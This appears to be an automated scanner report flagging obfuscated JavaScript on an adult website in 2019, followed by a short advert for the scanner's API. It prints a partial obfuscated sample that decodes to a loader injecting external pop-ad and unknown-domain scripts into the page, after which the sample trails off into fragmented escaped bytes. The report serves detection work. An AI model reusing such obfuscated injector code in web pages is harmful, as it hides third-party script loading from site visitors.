generic_javascript_obfuscation in best-porno.xyz

On 2019-08-07T01:50:41.192883+00:00 we found suspicious pattern generic_javascript_obfuscation, type: Suspicious, (JavaScript obfuscation is frequently used to hide malicious code (or with hope to protect intellectual property)) in the page http://best-porno.xyz/

The suspicious code sample:

b'var i=["\\u002f\\u002f\\u0063\\x31\\x2ep\\x6f\\x70\\x61\\x64\\x73.n\\x65\\u0074\\u002f\\u0070\\u006fp.\\x6a\\x73","\\x2f\\x2f\\u00632.po\\u0070\\x61\\u0064s\\x2en\\x65\\u0074/p\\u006f\\x70\\u002e\\x6a\\x73","\\x2f\\u002f\\x77\\u0077w\\x2e\\u0079k\\x68\\x6fz\\u006bl\\x6afp\\u0064td\\x2ec\\x6f\\x6d\\x2f\\u0061\\x2ej\\u0073","\\u002f\\u002f\\u0077\\x77\\x77\\u002e\\x71y\\u0064\\u007a\\x79crx\\x6c\\u006b\\x64l\\x69\\x6e\\u002e\\u0063\\x6f\\x6d/z\\u006etv\\u002e\\x6a\\x73",""],s=0,r,u=function(){if(""==i[s])return;r=z["\\x64\\x6fc\\x75m\\x65\\u006e\\x74"]["\\x63re\\x61\\x74\\x65Ele\\u006d\\x65\\' … b'\\x69' … b'\\x70' … b'\\x70' … b'\\x64' … b'\\x72' … b'\\x65' … b'\\x42' … b'\\x65' … b'\\x66' … b'\\x66' … b'\\x74' … b'\\x50' … b'\\x6f' … b'\\x65' … b'\\x72' … b'\\x2e' … b'\\x6f' … b'\\x70' … b'\\x61' … b'\\x64' … b'\\x65' … b'\\x6a' … b'\\x2f' … b'\\x2f' … b'\\x61' … b'\\x2e' … b'\\x65' … b'\\x70' … b'\\x6a' … b'\\x2f' … b'\\x77' … b'\\x2e' … b'\\x68' … b'\\x6f' … b'\\x6a' … b'\\x2e' … b'\\x6f' … b'\\x2f' … b'\\x2e' … b'\\x77' … b'\\x77' … b'\\x71' … b'\\x79' … b'\\x64' … b'\\x69' … b'\\x6e' … b'\\x6f' … b'\\x6a' … b'\\x64' … b'\\x6f' … b'\\x75' … b'\\x65' … b'\\x74' … b'\\x61' … b'\\x74' … b'\\x65' … b'\\x65' … b'\\x74' … b'\\x79' … b'\\x70' … b'\\x2f' … b'\\x74' … b'\\x61' … b'\\x6f' … b'\\x65' … b'\\x6e' … b'\\x74' … b'\\x79' … b'\\x54' … b'\\x61' … b'\\x4e' … b'\\x61' … b'\\x65' … b'\\x70' … b'\\x6f' … b'\\x6f' … b'\\x6e' … b'\\x65' … b'\\x72' … b'\\x72' … b'\\x74' … b'\\x6f' … b'\\x74' … b'\\x42' … b'\\x6f'

This feature is experimental so please feel free to contact us if you feel any of the reported issues is a false positive or you want to suggest a pattern that should be detected (we are using Yara standard).

Fully automated RESTful API is now available. Subscribe for your free trial today!